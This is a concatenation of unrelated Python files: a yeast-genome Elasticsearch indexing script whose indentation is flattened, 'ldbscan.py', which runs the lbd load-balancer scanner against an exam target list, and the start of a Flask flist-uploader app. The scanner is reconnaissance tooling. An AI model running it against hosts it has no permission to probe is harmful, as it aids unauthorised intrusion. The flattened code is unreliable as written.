response = requests.put(ES_URI + INDEX_NAME + "/", json=mapping)
if response.status_code != 200:
print(("ERROR: " + str(response.json())))
else:
print("SUCCESS")
except Exception as e:
print(e)
def cleanup():
delete_mapping()
put_mapping()
def setup():
# see if index exists, if not create it
indices = list(es.indices.get_alias().keys())
index_exists = INDEX_NAME in indices
if not index_exists:
put_mapping()
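# Illustrative driver sketch (an assumption, not the script's real entry point):
# a full re-index would typically recreate the mapping and then run the
# individual index_* functions defined below.
def _example_full_reindex():
    cleanup()
    index_genes()
    index_phenotypes()
    index_references()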
def index_not_mapped_genes():
url = "https://downloads.yeastgenome.org/curation/literature/genetic_loci.tab"
bulk_data = []
with open("./scripts/search/not_mapped.json",
"r") as json_data:
_data = json.load(json_data)
print(("indexing " + str(len(_data)) + " not physically mapped genes"))
for item in _data:
temp_aliases = []
if len(item["FEATURE_NAME"]) > 0:
obj = {
"name": item["FEATURE_NAME"],
"locus_name": item["FEATURE_NAME"],
"unmapped_name": item["FEATURE_NAME"],
"href": url,
"category": "locus",
"feature_type": ["Unmapped Genetic Loci"],
"aliases": item["ALIASES"].split("|"),
"description": item["DESCRIPTION"],
"is_quick_flag": "False"
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 300:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_downloads():
bulk_data = []
dbentity_file_obj = IndexESHelper.get_file_dbentity_keyword()
files = DBSession.query(Filedbentity).filter(Filedbentity.is_public == True,
Filedbentity.s3_url != None).all()
print(("indexing " + str(len(files)) + " download files"))
for x in files:
try:
keyword = []
status = ""
temp = dbentity_file_obj.get(x.dbentity_id)
if temp:
keyword = temp
if (x.dbentity_status == "Active" or x.dbentity_status == "Archived"):
if x.dbentity_status == "Active":
status = "Active"
else:
status = "Archived"
obj = {
"name":
x.display_name,
"raw_display_name":
x.display_name,
"filename": " ".join(x.display_name.split("_")),
"file_name_format": " ".join(x.display_name.split("_")),
"href": x.s3_url if x else None,
"category":
"download",
"description":
x.description,
"keyword":
keyword,
"format":
str(x.format.display_name),
"status":
str(status),
"file_size":
str(IndexESHelper.convertBytes(x.file_size))
if x.file_size is not None else x.file_size,
"year":
str(x.year),
"readme_url": x.readme_file.s3_url if x.readme_file else None,
"topic": x.topic.display_name,
"data": x.data.display_name,
"path_id": x.get_path_id()
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 50:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
except Exception as e:
            logging.error(e)
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_colleagues():
colleagues = DBSession.query(Colleague).all()
_locus_ids = IndexESHelper.get_colleague_locus()
_locus_names = IndexESHelper.get_colleague_locusdbentity()
_combined_list = IndexESHelper.combine_locusdbentity_colleague(
colleagues, _locus_names, _locus_ids)
print(("Indexing " + str(len(colleagues)) + " colleagues"))
bulk_data = []
for item_k, item_v in list(_combined_list.items()):
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(item_v)
if len(bulk_data) == 1000:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_genes():
    # Indexing just the S288C genes
# dbentity: 1364643 (id) -> straindbentity -> 274901 (taxonomy_id)
# list of dbentities comes from table DNASequenceAnnotation with taxonomy_id 274901
# feature_type comes from DNASequenceAnnotation as well
gene_ids_so = DBSession.query(
Dnasequenceannotation.dbentity_id, Dnasequenceannotation.so_id).filter(
Dnasequenceannotation.taxonomy_id == 274901).all()
dbentity_ids_to_so = {}
dbentity_ids = set([])
so_ids = set([])
for gis in gene_ids_so:
dbentity_ids.add(gis[0])
so_ids.add(gis[1])
dbentity_ids_to_so[gis[0]] = gis[1]
# add some non S288C genes
not_s288c = DBSession.query(Locusdbentity.dbentity_id).filter(
Locusdbentity.not_in_s288c == True).all()
for id in not_s288c:
dbentity_ids.add(id[0])
# assume non S288C features to be ORFs
dbentity_ids_to_so[id[0]] = 263757
all_genes = DBSession.query(Locusdbentity).filter(
Locusdbentity.dbentity_id.in_(list(dbentity_ids))).all()
    # make list of merged/deleted genes so they don't redirect when they show up as an alias
merged_deleted_r = DBSession.query(Locusdbentity.format_name).filter(
Locusdbentity.dbentity_status.in_(["Merged", "Deleted"])).all()
merged_deleted = [d[0] for d in merged_deleted_r]
feature_types_db = DBSession.query(
So.so_id, So.display_name).filter(So.so_id.in_(list(so_ids))).all()
feature_types = {}
for ft in feature_types_db:
feature_types[ft[0]] = ft[1]
tc_numbers_db = DBSession.query(LocusAlias).filter_by(
alias_type="TC number").all()
tc_numbers = {}
for tc in tc_numbers_db:
if tc.locus_id in tc_numbers:
tc_numbers[tc.locus_id].append(tc.display_name)
else:
tc_numbers[tc.locus_id] = [tc.display_name]
ec_numbers_db = DBSession.query(LocusAlias).filter_by(
alias_type="EC number").all()
ec_numbers = {}
for ec in ec_numbers_db:
if ec.locus_id in ec_numbers:
ec_numbers[ec.locus_id].append(ec.display_name)
else:
ec_numbers[ec.locus_id] = [ec.display_name]
secondary_db = DBSession.query(LocusAlias).filter_by(
alias_type="SGDID Secondary").all()
secondary_sgdids = {}
for sid in secondary_db:
if sid.locus_id in secondary_sgdids:
secondary_sgdids[sid.locus_id].append(sid.display_name)
else:
secondary_sgdids[sid.locus_id] = [sid.display_name]
bulk_data = []
print(("Indexing " + str(len(all_genes)) + " genes"))
##### test newer methods ##########
_summary = IndexESHelper.get_locus_dbentity_summary()
_protein = IndexESHelper.get_locus_dbentity_alias(["NCBI protein name"])
_phenos = IndexESHelper.get_locus_phenotypeannotation()
_goids = IndexESHelper.get_locus_go_annotation()
_aliases_raw = IndexESHelper.get_locus_dbentity_alias(
["Uniform", "Non-uniform", "Retired name", "UniProtKB ID"])
###################################
# TODO: remove line below in the next release
# not_mapped_genes = IndexESHelper.get_not_mapped_genes()
is_quick_flag = True
for gene in all_genes:
_systematic_name = ''
_name = ''
if gene.gene_name:
_name = gene.gene_name
if gene.systematic_name and gene.gene_name != gene.systematic_name:
_name += " / " + gene.systematic_name
else:
_name = gene.systematic_name
_systematic_name = gene.systematic_name
#summary = DBSession.query(Locussummary.text).filter_by(locus_id=gene.dbentity_id).all()
summary = []
if (_summary is not None):
summary = _summary.get(gene.dbentity_id)
#protein = DBSession.query(LocusAlias.display_name).filter_by(locus_id=gene.dbentity_id, alias_type="NCBI protein name").one_or_none()
protein = _protein.get(gene.dbentity_id)
if protein is not None:
protein = protein[0].display_name
        # TEMP: don't index due to schema change
# sequence_history = DBSession.query(Locusnoteannotation.note).filter_by(dbentity_id=gene.dbentity_id, note_type="Sequence").all()
# gene_history = DBSession.query(Locusnoteannotation.note).filter_by(dbentity_id=gene.dbentity_id, note_type="Locus").all()
#phenotype_ids = DBSession.query(Phenotypeannotation.phenotype_id).filter_by(dbentity_id=gene.dbentity_id).all()
phenotype_ids = []
if _phenos is not None:
temp = _phenos.get(gene.dbentity_id)
if temp is not None:
phenotype_ids = [x.phenotype_id for x in temp]
if len(phenotype_ids) > 0:
phenotypes = DBSession.query(Phenotype.display_name).filter(
Phenotype.phenotype_id.in_(phenotype_ids)).all()
else:
phenotypes = []
#go_ids = DBSession.query(Goannotation.go_id).filter(and_(Goannotation.go_qualifier != "NOT", Goannotation.dbentity_id == gene.dbentity_id)).all()
go_ids = _goids.get(gene.dbentity_id)
if go_ids is not None:
go_ids = [x.go_id for x in go_ids]
else:
go_ids = []
go_annotations = {
"cellular component": set([]),
"molecular function": set([]),
"biological process": set([])
}
if len(go_ids) > 0:
#go_ids = [g[0] for g in go_ids]
go = DBSession.query(
Go.display_name,
Go.go_namespace).filter(Go.go_id.in_(go_ids)).all()
for g in go:
go_annotations[g[1]].add(g[0] + " (direct)")
go_slim_ids = DBSession.query(Goslimannotation.goslim_id).filter(
Goslimannotation.dbentity_id == gene.dbentity_id).all()
if len(go_slim_ids) > 0:
go_slim_ids = [g[0] for g in go_slim_ids]
go_slim = DBSession.query(Goslim.go_id, Goslim.display_name).filter(
Goslim.goslim_id.in_(go_slim_ids)).all()
go_ids = [g[0] for g in go_slim]
go = DBSession.query(
Go.go_id, Go.go_namespace).filter(Go.go_id.in_(go_ids)).all()
for g in go:
for gs in go_slim:
if (gs[0] == g[0]):
go_annotations[g[1]].add(gs[1])
# add "quick direct" keys such as aliases, SGD, UniProt ID and format aliases
#aliases_raw = DBSession.query(LocusAlias.display_name, LocusAlias.alias_type).filter(and_(LocusAlias.locus_id==gene.dbentity_id, LocusAlias.alias_type.in_())).all()
aliases_raw = _aliases_raw.get(gene.dbentity_id)
alias_quick_direct_keys = []
aliases = []
if aliases_raw is not None:
for alias_item in aliases_raw:
name = alias_item.display_name
if name not in merged_deleted:
alias_quick_direct_keys.append(name)
if alias_item.alias_type != "UniProtKB ID":
aliases.append(name)
'''for d in aliases_raw:
name = d[0]
if name not in merged_deleted:
alias_quick_direct_keys.append(name)
if d[1] != "UniProtKB ID":
aliases.append(name)'''
# make everything in keys lowercase to ignore case
keys = []
_keys = [gene.gene_name, gene.systematic_name, gene.sgdid
] + alias_quick_direct_keys
# Add SGD:<gene SGDID> to list of keywords for quick search
_keys.append("SGD:{}".format(gene.sgdid))
# If this gene has a reservedname associated with it, add that reservedname to
# the list of keywords used for the quick search of this gene
reservedname = DBSession.query(Reservedname).filter_by(
locus_id=gene.dbentity_id).one_or_none()
if reservedname:
_keys.append(reservedname.display_name)
for k in _keys:
if k:
keys.append(k.lower())
ncbi_arr = None
if gene.dbentity_id:
ncbi_arr = IndexESHelper.get_locus_ncbi_data(gene.dbentity_id)
obj = {
"name":
_name,
"locus_name":
_name,
"sys_name":
_systematic_name,
"href":
gene.obj_url,
"description":
gene.description,
"category":
"locus",
"feature_type":
feature_types[dbentity_ids_to_so[gene.dbentity_id]],
"name_description":
gene.name_description,
"summary":
summary,
"locus_summary":
summary,
"phenotypes": [p[0] for p in phenotypes],
"aliases":
aliases,
"cellular_component":
list(go_annotations["cellular component"] - set([
"cellular component", "cellular component (direct)",
"cellular_component", "cellular_component (direct)"
])),
"biological_process":
list(go_annotations["biological process"] - set([
"biological process (direct)", "biological process",
"biological_process (direct)", "biological_process"
])),
"molecular_function":
list(go_annotations["molecular function"] - set([
"molecular function (direct)", "molecular function",
"molecular_function (direct)", "molecular_function"
])),
"ec_number":
ec_numbers.get(gene.dbentity_id),
"protein":
protein,
"tc_number":
tc_numbers.get(gene.dbentity_id),
"secondary_sgdid":
secondary_sgdids.get(gene.dbentity_id),
"status":
gene.dbentity_status,
            # TEMP: don't index due to schema change
# "sequence_history": [s[0] for s in sequence_history],
# "gene_history": [g[0] for g in gene_history],
"bioentity_id":
gene.dbentity_id,
"keys":
list(keys),
"is_quick_flag": str(is_quick_flag),
"ncbi": ncbi_arr
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 1000:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_phenotypes():
bulk_data = []
phenotypes = DBSession.query(Phenotype).all()
_result = IndexESHelper.get_pheno_annotations(phenotypes)
print(("Indexing " + str(len(_result)) + " phenotypes"))
for phenotype_item in _result:
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(phenotype_item)
if len(bulk_data) == 50:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_observables():
observables = DBSession.query(Apo).filter_by(
apo_namespace="observable").all()
print(("Indexing " + str(len(observables)) + " observables"))
bulk_data = []
for observable in observables:
obj = {
"name": observable.display_name,
"observable_name": observable.display_name,
"href": observable.obj_url,
"description": observable.description,
"category": "observable",
"keys": []
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 300:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_strains():
strains = DBSession.query(Straindbentity).all()
print(("Indexing " + str(len(strains)) + " strains"))
for strain in strains:
key_values = [
strain.display_name, strain.format_name, strain.genbank_id
]
keys = set([])
for k in key_values:
if k is not None:
keys.add(k.lower())
paragraph = DBSession.query(Strainsummary.text).filter_by(
strain_id=strain.dbentity_id).one_or_none()
description = None
if paragraph:
description = paragraph[0]
obj = {
"name": strain.display_name,
"strain_name": strain.display_name,
"href": strain.obj_url,
"description": strain.headline,
"category": "strain",
"keys": list(keys)
}
es.index(
index=INDEX_NAME, body=obj, id=str(uuid.uuid4()))
def index_reserved_names():
    # index reserved names; those with an associated locus are indexed under the
    # combined name and without quick-search keys
reserved_names = DBSession.query(Reservedname).all()
print(("Indexing " + str(len(reserved_names)) + " reserved names"))
for reserved_name in reserved_names:
name = reserved_name.display_name
href = reserved_name.obj_url
keys = [reserved_name.display_name.lower()]
# change name if has an orf
if reserved_name.locus_id:
locus = DBSession.query(Locusdbentity).filter(
Locusdbentity.dbentity_id == reserved_name.locus_id).one_or_none()
name = name + " / " + locus.systematic_name
href = locus.obj_url
keys = []
obj = {
"name": name,
"reserved_name": name,
"href": href,
"description": reserved_name.name_description,
"category": "reserved_name",
"keys": keys
}
es.index(
index=INDEX_NAME, body=obj, id=str(uuid.uuid4()))
def load_go_id_blacklist(list_filename):
    go_id_blacklist = set()
    # use a context manager so the file is closed, and strip the trailing newline
    with open(list_filename, "r") as blacklist_file:
        for line in blacklist_file:
            go_id_blacklist.add(line.rstrip("\n"))
    return go_id_blacklist
def index_go_terms():
go_id_blacklist = load_go_id_blacklist(
"scripts/search/go_id_blacklist.lst")
gos = DBSession.query(Go).all()
print(("Indexing " + str(len(gos) - len(go_id_blacklist)) + " GO terms"))
bulk_data = []
for go in gos:
if go.goid in go_id_blacklist:
continue
synonyms = DBSession.query(GoAlias.display_name).filter_by(
go_id=go.go_id).all()
references = set([])
gene_ontology_loci = set([])
annotations = DBSession.query(Goannotation).filter_by(
go_id=go.go_id).all()
for annotation in annotations:
if annotation.go_qualifier != "NOT":
gene_ontology_loci.add(annotation.dbentity.display_name)
references.add(annotation.reference.display_name)
numerical_id = go.goid.split(":")[1]
key_values = [
go.goid, "GO:" + str(int(numerical_id)), numerical_id,
str(int(numerical_id))
]
keys = set([])
for k in key_values:
if k is not None:
keys.add(k.lower())
obj = {
"name": go.display_name,
"go_name": go.display_name,
"href": go.obj_url,
"description": go.description,
"synonyms": [s[0] for s in synonyms],
"go_id": go.goid,
"gene_ontology_loci": sorted(list(gene_ontology_loci)),
"number_annotations": len(annotations),
"references": list(references),
"category": go.go_namespace.replace(" ", "_"),
"keys": list(keys)
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 800:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_disease_terms():
dos = DBSession.query(Disease).all()
print(("Indexing " + str(len(dos)) + " DO terms"))
bulk_data = []
for do in dos:
synonyms = DBSession.query(DiseaseAlias.display_name).filter_by(
disease_id=do.disease_id).all()
references = set([])
disease_loci = set([])
annotations = DBSession.query(Diseaseannotation).filter_by(
disease_id=do.disease_id).all()
for annotation in annotations:
if annotation.disease_qualifier != "NOT":
disease_loci.add(annotation.dbentity.display_name)
references.add(annotation.reference.display_name)
if do.doid != 'derives_from':
numerical_id = do.doid.split(":")[1]
key_values = [
do.doid, "DO:" + str(int(numerical_id)), numerical_id,
str(int(numerical_id))
]
keys = set([])
for k in key_values:
if k is not None:
keys.add(k.lower())
obj = {
"name": do.display_name,
"disease_name": do.display_name,
"category": "disease",
"href": do.obj_url,
"description": do.description,
"synonyms": [s[0] for s in synonyms],
"doid": do.doid,
"disease_loci": sorted(list(disease_loci)),
"number_annotations": len(annotations),
"references": list(references),
"keys": list(keys)
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 800:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_references():
_ref_loci = IndexESHelper.get_dbentity_locus_note()
_references = DBSession.query(Referencedbentity).all()
_abstracts = IndexESHelper.get_ref_abstracts()
_authors = IndexESHelper.get_ref_authors()
_aliases = IndexESHelper.get_ref_aliases()
bulk_data = []
print(("Indexing " + str(len(_references)) + " references"))
for reference in _references:
reference_loci = []
if len(_ref_loci) > 0:
temp_loci = _ref_loci.get(reference.dbentity_id)
if temp_loci is not None:
reference_loci = list(
set([x.display_name for x in IndexESHelper.flattern_list(temp_loci)]))
abstract = _abstracts.get(reference.dbentity_id)
if abstract is not None:
abstract = abstract[0]
sec_sgdids = _aliases.get(reference.dbentity_id)
sec_sgdid = None
authors = _authors.get(reference.dbentity_id)
if sec_sgdids is not None:
sec_sgdid = sec_sgdids[0]
if authors is None:
authors = []
journal = reference.journal
if journal:
journal = journal.display_name
key_values = [
reference.pmcid, reference.pmid, "pmid: " + str(reference.pmid),
"pmid:" + str(reference.pmid), "pmid " + str(reference.pmid),
reference.sgdid
]
keys = set([])
for k in key_values:
if k is not None:
keys.add(str(k).lower())
obj = {
"name": reference.citation,
"reference_name": reference.citation,
"href": reference.obj_url,
"description": abstract,
"author": authors,
"journal": journal,
"year": str(reference.year),
"reference_loci": reference_loci,
"secondary_sgdid": sec_sgdid,
"category": "reference",
"keys": list(keys)
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 1000:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_complex_names():
complexes = DBSession.query(Complexdbentity).all()
print(("Indexing " + str(len(complexes)) + " complex names"))
bulk_data = []
for c in complexes:
synonyms = DBSession.query(ComplexAlias.display_name).filter_by(
complex_id=c.dbentity_id).all()
references = set([])
refs = DBSession.query(ComplexReference).filter_by(
complex_id=c.dbentity_id).all()
for ref in refs:
references.add(ref.reference.display_name)
complex_loci = set([])
annotations = DBSession.query(Complexbindingannotation).filter_by(
complex_id=c.dbentity_id).all()
for a in annotations:
interactor = a.interactor
if interactor.locus_id is not None:
complex_loci.add(interactor.locus.display_name)
key_values = [
c.intact_id, c.complex_accession, c.sgdid
]
keys = set([])
for k in key_values:
if k is not None:
keys.add(k.lower())
obj = {
"name": c.display_name,
"complex_name": c.display_name,
"href": "/complex/" + c.complex_accession,
"description": c.description + "; " + c.properties,
"category": "complex",
"synonyms": [s[0] for s in synonyms],
"systematic_name": c.systematic_name,
"intact_id": c.intact_id,
"complex_accession": c.complex_accession,
"complex_loci": sorted(list(complex_loci)),
"references": list(references),
"keys": list(keys)
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 800:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_alleles():
so_id_to_term = dict([(x.so_id, x.display_name) for x in DBSession.query(So).all()])
alleles = DBSession.query(Alleledbentity).all()
print(("Indexing " + str(len(alleles)) + " allele names"))
bulk_data = []
for a in alleles:
allele_type = so_id_to_term.get(a.so_id)
synonyms = DBSession.query(AlleleAlias.display_name).filter_by(
allele_id=a.dbentity_id).all()
obj = {
"name": a.display_name,
"allele_name": a.display_name,
"href": "/allele/" + a.format_name,
"description": a.description,
"category": "Allele",
"synonyms": [s[0] for s in synonyms],
"allele_type": allele_type
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 800:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_chemicals():
all_chebi_data = DBSession.query(Chebi).all()
_result = IndexESHelper.get_chebi_annotations(all_chebi_data)
bulk_data = []
print(("Indexing " + str(len(all_chebi_data)) + " chemicals"))
for item_key, item_v in list(_result.items()):
if item_v is not None:
obj = {
"name": item_v.display_name,
"chemical_name": item_v.display_name,
"href": item_v.obj_url,
"description": item_v.description,
"category": "chemical",
"keys": [],
"chebiid": item_v.chebiid
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": "chemical_" + str(item_key)
}
})
bulk_data.append(obj)
if len(bulk_data) == 300:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_part_1():
index_phenotypes()
index_not_mapped_genes()
index_strains()
index_colleagues()
with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:
index_downloads()
with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:
index_genes()
with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:
index_chemicals()
def index_part_2():
index_reserved_names()
index_toolbar_links()
index_observables()
index_disease_terms()
index_references()
index_alleles()
with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:
index_go_terms()
with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:
index_complex_names()
def index_toolbar_links():
tools = DBSession.query(Tools).all()
print(("Indexing " + str(len(tools)) + " toolbar links"))
for x in tools:
keys = []
if x.index_key:
keys = x.index_key
obj = {
"name": x.display_name,
"resource_name": x.display_name,
"href": x.link_url,
"description": None,
"category": "resource",
"keys": keys
}
es.index(index=INDEX_NAME, body=obj, id=x.link_url)
if __name__ == "__main__":
'''
To run multi-processing add this:
with concurrent.futures.ProcessPoolExecutor(max_workers=8) as executor:
index_references()
'''
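    # A hedged sketch (not wired into the current flow): to actually run the
    # indexing steps in worker processes, the functions would have to be
    # submitted to the executor instead of being called inline, e.g.:
    #
    #   with concurrent.futures.ProcessPoolExecutor(max_workers=8) as executor:
    #       futures = [executor.submit(fn) for fn in (index_references, index_go_terms)]
    #       for future in concurrent.futures.as_completed(futures):
    #           future.result()  # surface any exception raised in a worker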
# index_strains()
# index_genes()
cleanup()
setup()
t1 = Thread(target=index_part_1)
t2 = Thread(target=index_part_2)
t1.start()
t2.start()
|
ldbscan.py
|
#!/usr/bin/env python
import subprocess
import multiprocessing
from multiprocessing import Process, Queue
import os
import time
def lbd(domain):
    domain = domain.strip()
    print("INFO: Running general lbd scans for " + domain)
    # lbdSCAN = "lbd %s" % (domain)
    # results = subprocess.check_output(lbdSCAN, shell=True)
    # lines = results.split("\n")
    lines = subprocess.check_output(['lbd', domain]).split("\n")
    for line in lines:
        line = line.strip()
        # report both positive and negative load-balancing findings,
        # without bailing out on the first non-matching line
        if ("Load-balancing" in line) and not ("NOT" in line):
            print(line)
        elif ("does NOT use Load-balancing" in line):
            print(line)
    return
if __name__=='__main__':
    f = open('results/exam/targets.txt', 'r') # CHANGE THIS!! grab the alive hosts from the discovery scan for enum
    # Also check Nmap user-agent string, should be set to Firefox
    jobs = []
    for domain in f:
        p = multiprocessing.Process(target=lbd, args=(domain,))
        jobs.append(p)
        p.start()
    f.close()
    # wait for all scans to finish before exiting
    for p in jobs:
        p.join()
|
flist-uploader.py
|
import os
import sys
import shutil
import json
import threading
import time
import hub.itsyouonline
import hub.threebot
import hub.security
from stat import *
from flask import Flask, Response, request, redirect, url_for, render_template, abort, make_response, send_from_directory, session
from werkzeug.utils import secure_filename
from werkzeug.middleware.proxy_fix import ProxyFix
from werkzeug.wrappers import Request
from config import config
from hub.flist import HubPublicFlist, HubFlist
from hub.docker import HubDocker
from hub.notifier import EventNotifier
#
# runtime configuration
# these locations should work out of the box if you use the default settings
#
if not 'userdata-root-path' in config:
config['userdata-root-path'] = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../public")
if not 'workdir-root-path' in config:
config['workdir-root-path'] = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../workdir")
if not 'public-directory' in config:
config['public-directory'] = os.path.join(config['userdata-root-path'], "users")
if not 'flist-work-directory' in config:
config['flist-work-directory'] = os.path.join(config['workdir-root-path'], "temp")
if not 'docker-work-directory' in config:
config['docker-work-directory'] = os.path.join(config['workdir-root-path'], "temp")
if not 'upload-directory' in config:
config['upload-directory'] = os.path.join(config['workdir-root-path'], "distfiles")
if not 'allowed-extensions' in config:
config['allowed-extensions'] = set(['.tar.gz'])
if not 'authentication' in config:
config['authentication'] = True
print("[+] user directory : %s" % config['userdata-root-path'])
print("[+] works directory : %s" % config['workdir-root-path'])
print("[+] upload directory: %s" % config['upload-directory'])
print("[+] flist creation : %s" % config['flist-work-directory'])
print("[+] docker creation : %s" % config['docker-work-directory'])
print("[+] public directory: %s" % config['public-directory'])
#
# pre-check settings
# checking configuration settings needed for runtime
#
hc = HubFlist(config)
if not hc.check():
print("[-] pre-check: your local configuration seems not correct")
print("[-] pre-check: please check config.py settings and backend status")
sys.exit(1)
#
# initialize flask application
#
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)
app.url_map.strict_slashes = False
app.secret_key = os.urandom(24)
# notifications
announcer = EventNotifier()
if config['authentication']:
hub.itsyouonline.configure(app,
config['iyo-clientid'], config['iyo-secret'], config['iyo-callback'],
'/_iyo_callback', None, True, True, 'organization', config['guest-token']
)
hub.threebot.configure(app, config['threebot-appid'], config['threebot-privatekey'], config['threebot-seed'])
else:
hub.itsyouonline.disabled(app)
config['official-repositories'] = ['Administrator']
print("[-] -- WARNING -------------------------------------")
print("[-] ")
print("[-] AUTHENTICATION DISABLED ")
print("[-] FULL CONTROL IS ALLOWED FOR ANYBODY ")
print("[-] ")
print("[-] This mode should be _exclusively_ used in local ")
print("[-] development or private environment, never in ")
print("[-] public production environment, except if you ")
print("[-] know what you're doing ")
print("[-] ")
print("[-] -- WARNING -------------------------------------")
######################################
#
# TEMPLATES MANIPULATION
#
######################################
def allowed_file(filename, validate=False):
if validate:
return filename.endswith(".flist")
for ext in config['allowed-extensions']:
if filename.endswith(ext):
return True
return False
def globalTemplate(filename, args):
args['debug'] = config['debug']
if 'username' in session:
args['username'] = session['username']
if 'accounts' in session:
args['accounts'] = session['accounts']
return render_template(filename, **args)
def file_from_flist(filename):
cleanfilename = filename
for ext in config['allowed-extensions']:
if cleanfilename.endswith(ext):
cleanfilename = cleanfilename[:-len(ext)]
return cleanfilename
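# Example with the default 'allowed-extensions' ({'.tar.gz'}) and a hypothetical name:
#   file_from_flist("ubuntu-20.04.tar.gz") -> "ubuntu-20.04"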
def uploadSuccess(flistname, filescount, home, username=None):
if username is None:
username = session['username']
settings = {
'username': username,
'accounts': session['accounts'],
'flistname': flistname,
'filescount': 0,
'flisturl': "%s/%s/%s" % (config['public-website'], username, flistname),
'ardbhost': 'zdb://%s:%d' % (config['backend-public-host'], config['backend-public-port']),
}
return globalTemplate("success.html", settings)
def internalRedirect(target, error=None, extra={}):
settings = {
'username': None,
'accounts': [],
}
settings.update(extra)
if error:
settings['error'] = error
return globalTemplate(target, settings)
def flist_merge_post():
sources = request.form.getlist('flists[]')
target = request.form['name']
return flist_merge_data(sources, target)
def flist_merge_data(sources, target):
data = {}
data['error'] = None
data['sources'] = sources
data['target'] = target
if not isinstance(sources, list):
data['error'] = 'malformed json request'
return data
if len(data['sources']) == 0:
data['error'] = "no source found"
return data
# ensure .flist extension to each sources
fsources = []
for source in data['sources']:
# missing username/filename
if "/" not in source:
data['error'] = "malformed source filename"
return data
cleaned = source if source.endswith(".flist") else source + ".flist"
fsources.append(cleaned)
data['sources'] = fsources
# ensure each sources exists
for source in data['sources']:
temp = source.split("/")
item = HubPublicFlist(config, temp[0], temp[1])
if not item.file_exists:
            data['error'] = "%s does not exist" % source
return data
if not data['target']:
data['error'] = "missing build (target) name"
return data
if "/" in data['target']:
data['error'] = "build name not allowed"
return data
if not data['target'].endswith('.flist'):
data['target'] += '.flist'
return data
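# Hedged example of the expected shape (user/file names are placeholders and both
# source flists are assumed to exist on disk):
#   flist_merge_data(["alice/base.flist", "alice/app"], "combined")
#   -> {'error': None, 'sources': ['alice/base.flist', 'alice/app.flist'], 'target': 'combined.flist'}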
######################################
#
# ROUTING ACTIONS
#
######################################
@app.route('/logout')
def logout():
hub.security.invalidate()
return internalRedirect("users.html")
@app.route('/login-method')
def login_method():
return internalRedirect("logins.html")
@app.route('/login-iyo')
@hub.itsyouonline.force_login()
def login_iyo():
return internalRedirect("users.html")
@app.route('/token/<token>')
def show_token(token):
return globalTemplate("token.html", {'token': token, "url": config['public-website']})
@app.route('/upload', methods=['GET', 'POST'])
@hub.security.protected()
def upload_file():
username = session['username']
if request.method == 'POST':
response = api_flist_upload_prepare(request, username)
return response
"""
if response['status'] == 'success':
return uploadSuccess(response['flist'], response['stats'], response['home'])
if response['status'] == 'error':
